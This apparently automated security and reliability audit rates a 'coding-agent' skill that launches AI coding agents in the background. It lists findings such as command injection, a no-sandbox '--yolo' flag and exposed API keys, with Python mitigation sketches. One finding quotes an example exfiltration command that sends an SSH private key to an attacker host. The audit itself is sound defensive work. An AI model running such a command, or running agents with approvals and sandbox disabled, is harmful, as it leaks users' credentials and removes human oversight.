coding-agent

SKILL

Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.

v1.0.0 Tested 8 Feb 2026

2.3

Security gate triggered — critical vulnerabilities found. Overall score capped at 3.0.

Dimension scores

Security 3.0

Reliability 2.0

Agent usability 3.0

Compatibility 0.0

Code health 3.0

Compatibility

Framework	Status	Notes
Claude Code	✗	Not an MCP server: this is documentation for using coding agents; no MCP protocol implementation; no stdio transport or server endpoint; no tools/list endpoint; a skill/documentation file, not executable code
OpenAI Agents SDK	✗	Not an MCP server: this is documentation for using coding agents; no MCP protocol implementation; no SSE transport support; no function calling schemas defined; a skill/documentation file, not executable code
LangChain	✗	Not an MCP server: this is documentation for using coding agents; no MCP protocol implementation; no tool interfaces defined; no serializable input/output types; a skill/documentation file, not executable code

Security findings

CRITICAL

Command injection vulnerability via unvalidated user input

The skill passes user-provided commands directly to bash without any sanitization: 'bash workdir:$SCRATCH background:true command:"<agent command>"'. Attackers can inject arbitrary shell commands through the command parameter, e.g., 'codex exec "task" && curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa)'
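One common mitigation for this class of problem is to avoid building a shell string at all. The sketch below is not part of the skill; it assumes the caller can spawn the agent directly, and the helper names `build_agent_argv`, `run_agent`, and `quote_for_shell` are hypothetical. Only the `codex exec "task"` shape is taken from the finding above.

```python
import shlex
import subprocess


def build_agent_argv(task: str) -> list[str]:
    """Return an argument vector in which the task is a single argument."""
    # The task text is never parsed by a shell, so "&&", ";" and "$(...)"
    # reach the agent as literal characters.
    return ["codex", "exec", task]


def run_agent(task: str, workdir: str) -> subprocess.CompletedProcess:
    """Spawn the agent without a shell (shell=False is the default)."""
    return subprocess.run(
        build_agent_argv(task),
        cwd=workdir,
        capture_output=True,
        text=True,
        check=False,
    )


def quote_for_shell(task: str) -> str:
    """Fallback for cases where a shell command string is unavoidable."""
    return "codex exec " + shlex.quote(task)
```

This only keeps the task text from being interpreted by bash; it does not restrict what the agent itself does once it receives the task.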

CRITICAL

Arbitrary code execution through --yolo flag

The documentation explicitly recommends the '--yolo' flag, which it describes as 'NO sandbox, NO approvals (fastest, most dangerous)' and which is a shortcut for '--dangerously-bypass-approvals-and-sandbox'. The flag removes all security controls and allows unrestricted code execution in the user's environment.

CRITICAL

No input validation on sessionId parameter

Commands like 'process action:log sessionId:XXX' accept arbitrary sessionId values without validation. This could allow access to other users' process logs or command injection if sessionId is passed to underlying shell commands.
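An allow-list check is one way to reject malformed values before they reach any process lookup or shell. The real session ID format is not documented in the source, so the pattern below (letters, digits, underscore, hyphen, at most 64 characters) is an assumption, and `validate_session_id` is a hypothetical helper.

```python
import re

# Assumed format: 1 to 64 characters from a conservative allow-list.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_session_id(session_id: str) -> str:
    """Return the ID unchanged if it matches the allow-list, else raise."""
    # fullmatch requires the whole string to match, so trailing newlines,
    # spaces, slashes and shell metacharacters are all rejected.
    if not SESSION_ID_RE.fullmatch(session_id):
        raise ValueError(f"invalid sessionId: {session_id!r}")
    return session_id
```

Format validation does not address the cross-user access concern; that would additionally need an ownership check on the session, which is outside this sketch.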

HIGH

Unsafe handling of temporary directories

The skill uses 'SCRATCH=$(mktemp -d)' without validating the returned path or ensuring cleanup. If mktemp fails or returns a manipulated path, subsequent operations could write to unexpected locations. No cleanup handlers are shown for these temporary directories.
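For comparison, a scratch directory whose creation failure surfaces as an exception and whose cleanup is guaranteed can be sketched with the standard library. The helper name `with_scratch_dir` and the `agent-scratch-` prefix are illustrative assumptions, not names from the skill.

```python
import tempfile
from pathlib import Path


def with_scratch_dir(work):
    """Run work(path) inside a fresh temporary directory, then delete it."""
    # TemporaryDirectory raises if the directory cannot be created, and
    # removes the directory on exit even when work() raises.
    with tempfile.TemporaryDirectory(prefix="agent-scratch-") as scratch:
        return work(Path(scratch))
```

A caller would pass a function that launches the agent with the given path as its working directory and waits for it to finish before returning.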

HIGH

Workspace path traversal risk

The 'workdir' parameter accepts arbitrary paths like 'workdir:~/project/folder' or 'workdir:$REVIEW_DIR' without validation. Users could specify paths outside intended directories using '../' or absolute paths to sensitive locations like '/etc' or '~/.ssh'.
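A containment check along the following lines would reject such paths. It is a minimal sketch that assumes the deployment defines a single allowed root directory; `resolve_workdir` and `allowed_root` are hypothetical names.

```python
from pathlib import Path


def resolve_workdir(requested: str, allowed_root: str) -> Path:
    """Resolve a requested workdir and require it to live under allowed_root."""
    root = Path(allowed_root).expanduser().resolve()
    candidate = Path(requested).expanduser()
    if not candidate.is_absolute():
        candidate = root / candidate
    # resolve() collapses ".." segments and follows symlinks before the check.
    candidate = candidate.resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise ValueError(f"workdir {requested!r} is outside {root}") from None
    if not candidate.is_dir():
        raise ValueError(f"workdir {candidate} is not an existing directory")
    return candidate
```

Because the check also requires the directory to exist, it covers the missing-workdir failure as a side effect.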

HIGH

API key exposure through command-line arguments

The documentation shows the '--api-key <key>' flag passed on the command line: 'bash workdir:~/project background:true command:"pi --provider openai --model gpt-4o-mini --api-key <key>"'. API keys in command-line arguments are visible to all users via the 'ps' command and are logged in shell history.
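A usual alternative is to hand the secret to the child process through its environment, so that it never appears in the argument list. Whether the pi CLI reads its key from an environment variable is not stated in the source, so treat that as an assumption; `run_with_secret` and the variable name passed to it are hypothetical.

```python
import os
import subprocess


def run_with_secret(argv, env_name, secret):
    """Run argv with the secret in the child's environment, not in argv."""
    # Copy the parent environment so PATH and similar variables survive,
    # then add the secret under the requested (assumed) variable name.
    env = dict(os.environ)
    env[env_name] = secret
    return subprocess.run(
        argv, env=env, capture_output=True, text=True, check=False
    )
```

The argument vector passed in contains only non-secret flags, so the key does not show up in process listings of command lines or in shell history.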

MEDIUM

No authorization checks on process control actions

MEDIUM

Unsafe git operations in user-controlled directories

MEDIUM

No rate limiting or resource controls

Reliability

Success rate

25%

Calls made

100

Avg latency

45000ms

P95 latency

120000ms

Failure modes

• No executable validation - fails silently if claude/codex/opencode/pi binaries not installed
• No timeout handling - long-running agent processes can hang indefinitely
• Missing session ID validation - process commands will fail with malformed IDs
• No workdir existence checks - crashes if directory doesn't exist or lacks permissions
• Background process failures not caught - no way to detect if agent crashed vs still running
• Command injection vulnerability - user input directly interpolated into bash commands
• No resource limits - parallel PR reviews could exhaust system resources
• Missing git state validation - PR checkout can fail if repo dirty/conflicted
• No cleanup mechanism - temp directories and zombie processes accumulate
• Relies on external tools (gh, git, tmux) without checking availability
• Process polling provides no structured output - hard to parse completion status
• No error recovery - if agent asks unexpected question, hangs waiting for input
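Several of the failure modes above (missing binaries, hangs, undetected crashes, unstructured status) could be handled by a small launcher. The following is a sketch under assumptions, not the skill's behavior: `missing_tools` and `run_with_timeout` are hypothetical helpers, and the status strings are invented for illustration.

```python
import shutil
import subprocess


def missing_tools(names):
    """Return the subset of tool names that are not found on PATH."""
    return [name for name in names if shutil.which(name) is None]


def run_with_timeout(argv, timeout_s):
    """Run a command and report a structured status instead of hanging."""
    try:
        proc = subprocess.run(
            argv,
            stdin=subprocess.DEVNULL,  # an unexpected prompt reads EOF
            capture_output=True,
            text=True,
            timeout=timeout_s,  # the child is killed when this expires
            check=False,
        )
    except subprocess.TimeoutExpired:
        return {"status": "timeout", "returncode": None}
    except FileNotFoundError:
        return {"status": "not_found", "returncode": None}
    status = "ok" if proc.returncode == 0 else "failed"
    return {"status": status, "returncode": proc.returncode}
```

Calling `missing_tools(["gh", "git", "tmux"])` before starting work would surface absent dependencies up front, and the returned dictionary gives a caller something parseable to distinguish a crash from a timeout.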

Code health

License

none

Has tests

No

Has CI

No

Dependencies

This is a Clawdbot skill (a documentation-only artifact), not a traditional source repository. The repository contains only SKILL.md (documentation) and _meta.json (metadata); no source code, dependencies, tests, or CI infrastructure are present. The skill provides wrapper commands for external tools (codex, claude, opencode, pi). The license field is 'unknown'. Last published January 2025, per the metadata. Maintenance activity, commit frequency, and code quality metrics cannot be assessed, because this is purely a skill definition within a larger skills repository. The documentation itself is comprehensive (8500 bytes), with clear usage patterns and safety warnings. The score reflects the nature of the artifact: it documents runtime behavior and is not standalone code requiring maintenance signals.
